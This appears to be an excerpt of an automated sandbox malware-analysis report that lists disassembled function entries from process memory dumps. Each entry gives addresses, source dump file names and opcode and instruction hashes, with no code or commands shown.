                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1888bf6e437480996ae1d85926ff92840f5601654caf8fa09bc2938cb53e330
                                                                    • Instruction ID: ae13212347ed8cc53c8fee9a1c12988d5f76f718d961ce048dac64b6124c8fb0
                                                                    • Opcode Fuzzy Hash: b1888bf6e437480996ae1d85926ff92840f5601654caf8fa09bc2938cb53e330
                                                                    • Instruction Fuzzy Hash: F3D05E30B609094B8B0CB62D8858534B3D5F7AA2067D452B8940BC3281EE25ECC68B84
                                                                    Function 00007FF848E633D1 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction ID: cadf967c029e486b9d6c9b0734e6fc60d261c9c85d6428012597e678f49e7799
                                                                    • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction Fuzzy Hash: 0FE01A20F0D12A8FF795BA10C8503BD22A1BF85381F9450B9D86DB76E6CF387C818B49
                                                                    Function 00007FF848E63759 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction ID: 8576958cd4ac830fef12b803800038b9b0a2429590f4631019fefa52e676df46
                                                                    • Opcode Fuzzy Hash: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction Fuzzy Hash: 0BE01211E1C5554EF29DB56C44313B950C1BF98751F884179D41EF32C3DE5C3C400396
                                                                    Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction ID: 22c00e277981450ec3cfd80455c7aa1b3eb6fa9d4df6ebc78a5e847680a4518f
                                                                    • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction Fuzzy Hash: D6C08C00E5F53B08E445712E14020ACA2017BC42A0FD00032C02C700929EAD30C5034E
                                                                    Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction ID: efbce210bacd50ef177f3dfb13d4aceba7f181afd6019f63510de32bdeb12342
                                                                    • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction Fuzzy Hash: 39C04C305258098FC944FB6DC98995477A0FB1D215BD60190E40DC7171E66AEC95C745
                                                                    Function 00007FF848E612E0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction ID: 66eda309ea09482d7201f089046b183db6eb6a68ed1dc125f00a417f2063d7f1
                                                                    • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction Fuzzy Hash: E0C08C309208088FC908FB28C88480433A0FB09200BC10090E008C7170E229ECD0C740
                                                                    Function 00007FF848E657D9 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37303cdf7d5b2bfb168b25eecd740066e480b9093870f04996061f84b7bb6d1d
                                                                    • Instruction ID: 00c10bc96eaa50c40aa0e890c70e7b45a302af74adaf549488a77e9657abcfd6
                                                                    • Opcode Fuzzy Hash: 37303cdf7d5b2bfb168b25eecd740066e480b9093870f04996061f84b7bb6d1d
                                                                    • Instruction Fuzzy Hash: 7DC02B02F0DC169BF25F7204402027E0402DF80B44F844031E02EC33CACF0D2F0106CA
                                                                    Function 00007FF848E79E2C Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction ID: 865005724ea984a9f10bb49a6285fe106a7e2a3011e3fa3f03cccf382a9b41f2
                                                                    • Opcode Fuzzy Hash: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction Fuzzy Hash: C8D0C930C095588FEBA0EB14C840B9972B1BF48341F5001F6900DE3285CB356DC0CF81
                                                                    Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction ID: 11f8d10550346e9f3a4f007398059a370a93a6d624c90b1792530cf415cde2e8
                                                                    • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction Fuzzy Hash: E5B01200CAE41F04E408317A094206470417BC4140FC00070D40C70086D9DD3094034A